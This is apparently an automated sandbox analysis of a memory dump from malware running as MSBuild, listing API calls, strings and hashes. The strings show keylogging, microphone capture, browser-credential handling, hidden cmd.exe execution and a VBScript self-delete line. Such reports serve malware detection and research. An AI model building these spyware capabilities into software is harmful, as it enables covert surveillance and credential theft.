                                                                                                • Opcode ID: 517ef8501d39ed80bd5d3989cd54e6cd38b7eb486680de81052e85c6479d25b4
                                                                                                • Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
                                                                                                • Opcode Fuzzy Hash: 517ef8501d39ed80bd5d3989cd54e6cd38b7eb486680de81052e85c6479d25b4
                                                                                                • Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59
                                                                                                APIs
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                                                                  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                                  • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                  • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                • String ID: /sort "Visit Time" /stext "$8>G
                                                                                                • API String ID: 368326130-2663660666
                                                                                                • Opcode ID: 343bbff2b1f6d2a81ded7ae9fccc3908f2447b4f07859ff5f1d91aa182ddba68
                                                                                                • Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
                                                                                                • Opcode Fuzzy Hash: 343bbff2b1f6d2a81ded7ae9fccc3908f2447b4f07859ff5f1d91aa182ddba68
                                                                                                • Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
                                                                                                APIs
                                                                                                  • Part of subcall function 0041B58F: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                                                • ShellExecuteW.SHELL32(?,open,00000000), ref: 0040C632
                                                                                                • ExitProcess.KERNEL32 ref: 0040C63E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateExecuteExitFileProcessShell
                                                                                                • String ID: fso.DeleteFile(Wscript.ScriptFullName)$open
                                                                                                • API String ID: 2309964880-3562070623
                                                                                                • Opcode ID: 390205f58295ca3481fe5ab8602b7fa4db45e117a05dec8e4925fefabcc5de7f
                                                                                                • Instruction ID: 568fed376c07edf90cd2df9b8610832c68d616ac56d6d0e00b2c9eff25916ff3
                                                                                                • Opcode Fuzzy Hash: 390205f58295ca3481fe5ab8602b7fa4db45e117a05dec8e4925fefabcc5de7f
                                                                                                • Instruction Fuzzy Hash: 692145315042405AC324FB25E8969BF77E4AFD1319F50493FF482620F2EF38AA49C69A
                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                • wsprintfW.USER32 ref: 0040A905
                                                                                                  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EventLocalTimewsprintf
                                                                                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                                                • API String ID: 1497725170-1359877963
                                                                                                • Opcode ID: 0c29132a8f5ff73610e7b1771e8d339d9c6428c12f3068cfd882d0431d65c492
                                                                                                • Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
                                                                                                • Opcode Fuzzy Hash: 0c29132a8f5ff73610e7b1771e8d339d9c6428c12f3068cfd882d0431d65c492
                                                                                                • Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9
                                                                                                APIs
                                                                                                  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
                                                                                                • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateThread$LocalTime$wsprintf
                                                                                                • String ID: Online Keylogger Started
                                                                                                • API String ID: 112202259-1258561607
                                                                                                • Opcode ID: ee3a13647202a8f1304717967fce395e506a5973f81be1ac5120480b783b0218
                                                                                                • Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
                                                                                                • Opcode Fuzzy Hash: ee3a13647202a8f1304717967fce395e506a5973f81be1ac5120480b783b0218
                                                                                                • Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                                                                APIs
                                                                                                • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
                                                                                                • GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
                                                                                                • __dosmaperr.LIBCMT ref: 0044AAFE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                • String ID: `@
                                                                                                • API String ID: 2583163307-951712118
                                                                                                • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                • Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
                                                                                                • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                • Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F
                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                                                                • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEventHandleObjectSingleWait
                                                                                                • String ID: Connection Timeout
                                                                                                • API String ID: 2055531096-499159329
                                                                                                • Opcode ID: 99978ec5683d6a671997bd421d48c57d1878bc22c47c404c8c0f0353ff203f3a
                                                                                                • Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
                                                                                                • Opcode Fuzzy Hash: 99978ec5683d6a671997bd421d48c57d1878bc22c47c404c8c0f0353ff203f3a
                                                                                                • Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                                                                  • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
                                                                                                  • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                • String ID: bad locale name
                                                                                                • API String ID: 3628047217-1405518554
                                                                                                • Opcode ID: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                                                • Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
                                                                                                • Opcode Fuzzy Hash: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                                                • Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C
                                                                                                APIs
                                                                                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExecuteShell
                                                                                                • String ID: /C $cmd.exe$open
                                                                                                • API String ID: 587946157-3896048727
                                                                                                • Opcode ID: 6699625853e23096ac9cad3f7578a7bff2c993ae7ed2a6c2b658dd2f5a42760b
                                                                                                • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                                                                • Opcode Fuzzy Hash: 6699625853e23096ac9cad3f7578a7bff2c993ae7ed2a6c2b658dd2f5a42760b
                                                                                                • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
APIs
• GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
• GetProcAddress.KERNEL32(00000000), ref: 00401441
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• API ID: AddressHandleModuleProc
• String ID: GetCursorInfo$User32.dll
• API String ID: 1646373207-2714051624
APIs
• LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
• GetProcAddress.KERNEL32(00000000), ref: 004014E6
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• API ID: AddressLibraryLoadProc
• String ID: GetLastInputInfo$User32.dll
• API String ID: 2574300362-1519888992
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• API ID: __alldvrm$_strrchr
• API String ID: 1036877536-0
Strings
• [Cleared browsers logins and cookies.], xrefs: 0040B8DE
• Cleared browsers logins and cookies., xrefs: 0040B8EF
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• API ID: Sleep
• String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
• API String ID: 3472027048-1236744412
APIs
  • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
  • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
  • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
• Sleep.KERNEL32(00000BB8), ref: 004115C3
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• API ID: CloseOpenQuerySleepValue
• String ID: @CG$exepath$BG
• API String ID: 4119054056-3221201242
APIs
  • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
  • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
  • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
• Sleep.KERNEL32(000001F4), ref: 00409C95
• Sleep.KERNEL32(00000064), ref: 00409D1F
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• API ID: Window$SleepText$ForegroundLength
• String ID: [ $ ]
• API String ID: 3309952895-93608704
APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
  • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
  • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
• _UnwindNestedFrames.LIBCMT ref: 00438124
• __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
• CallCatchBlock.LIBVCRUNTIME ref: 0043815D
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
• API String ID: 737400349-0
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
• GetLastError.KERNEL32(?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• API ID: LibraryLoad$ErrorLast
• API String ID: 3177248105-0
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
• GetFileSize.KERNEL32(00000000,00000000), ref: 0041B647
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B66C
• CloseHandle.KERNEL32(00000000), ref: 0041B67A
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• API ID: File$CloseCreateHandleReadSize
• API String ID: 3919263394-0
APIs
• GetSystemMetrics.USER32(0000004C), ref: 00418519
• GetSystemMetrics.USER32(0000004D), ref: 0041851F
• GetSystemMetrics.USER32(0000004E), ref: 00418525
• GetSystemMetrics.USER32(0000004F), ref: 0041852B
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• API ID: MetricsSystem
• API String ID: 4116985748-0
                                                                                                APIs
                                                                                                • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
                                                                                                • API ID: CloseHandleOpenProcess
                                                                                                • API String ID: 39102293-0
                                                                                                APIs
                                                                                                • __startOneArgErrorHandling.LIBCMT ref: 00441F6D
                                                                                                • API ID: ErrorHandling__start
                                                                                                • String ID: pow
                                                                                                • API String ID: 3213639722-2276729525
                                                                                                APIs
                                                                                                • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
                                                                                                • API ID: Info
                                                                                                • String ID: $fD
                                                                                                • API String ID: 1807457897-3092946448
                                                                                                APIs
                                                                                                • GetACP.KERNEL32(?,20001004,?,00000002), ref: 004509B9
                                                                                                • String ID: ACP$OCP
                                                                                                • API String ID: 0-711371036
                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                                                                Strings
                                                                                                • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                                                                • API ID: LocalTime
                                                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                                                • API String ID: 481472006-1507639952
                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                • API ID: LocalTime
                                                                                                • String ID: | $%02i:%02i:%02i:%03i
                                                                                                • API String ID: 481472006-2430845779
                                                                                                APIs
                                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
                                                                                                • API ID: ExistsFilePath
                                                                                                • String ID: alarm.wav$xIG
                                                                                                • API String ID: 1174141254-4080756945
                                                                                                APIs
                                                                                                  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                                                                • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                                                                • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                • String ID: Online Keylogger Stopped
                                                                                                • API String ID: 1623830855-1496645233
                                                                                                APIs
                                                                                                • waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
                                                                                                • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D
                                                                                                • API ID: wave$BufferHeaderPrepare
                                                                                                • String ID: T=G
                                                                                                • API String ID: 2315374483-379896819
                                                                                                APIs
                                                                                                • IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
                                                                                                • API ID: LocaleValid
                                                                                                • String ID: IsValidLocaleName$j=D
                                                                                                • API String ID: 1901932003-3128777819
                                                                                                • API ID: H_prolog
                                                                                                • String ID: T=G$T=G
                                                                                                • API String ID: 3519838083-3732185208
                                                                                                APIs
                                                                                                • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                                                                  • Part of subcall function 00409B10: GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
                                                                                                  • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                  • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                  • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                  • Part of subcall function 00409B10: GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
                                                                                                  • Part of subcall function 00409B10: ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                  • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                                • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                • String ID: [AltL]$[AltR]
                                                                                                • API String ID: 2738857842-2658077756
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00448825
                                                                                                  • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                • API ID: ErrorFreeHeapLast_free
                                                                                                • String ID: `@$`@
                                                                                                • API String ID: 1353095263-20545824
                                                                                                • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                • Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
                                                                                                • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                • Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40
                                                                                                APIs
                                                                                                • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: State
                                                                                                • String ID: [CtrlL]$[CtrlR]
                                                                                                • API String ID: 1649606143-2446555240
                                                                                                • Opcode ID: d3bfbbd6b4e89cd63980a9ff1b49381952101389b4aa81d5fd12017d0c3b90ad
                                                                                                • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                                                                • Opcode Fuzzy Hash: d3bfbbd6b4e89cd63980a9ff1b49381952101389b4aa81d5fd12017d0c3b90ad
                                                                                                • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                                                                APIs
                                                                                                • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                • WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ObjectProcessSingleTerminateWait
                                                                                                • String ID: pth_unenc
                                                                                                • API String ID: 1872346434-4028850238
                                                                                                • Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                • Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
                                                                                                • Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                • Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
                                                                                                • GetLastError.KERNEL32 ref: 0043FB02
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 1717984340-0
                                                                                                • Opcode ID: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
                                                                                                • Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
                                                                                                • Opcode Fuzzy Hash: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
                                                                                                • Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.3174587435.0000000002DDF000.00000004.00000010.00020000.00000000.sdmp, Offset: 02DDF000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_2ddf000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c6651337c1f4b72587a62ad46b43f18b5ca31dc96388ea372a26f0d8357ff378
                                                                                                • Instruction ID: 3d7c95b38243080f936720715d358e8e804da2fa2c3af042622c1734302909e6
                                                                                                • Opcode Fuzzy Hash: c6651337c1f4b72587a62ad46b43f18b5ca31dc96388ea372a26f0d8357ff378
                                                                                                • Instruction Fuzzy Hash: CC51D3A584EBC69FC3135B7498282647FB4AF0B254B1B45DBC0C5CF9A3D6690C5AD322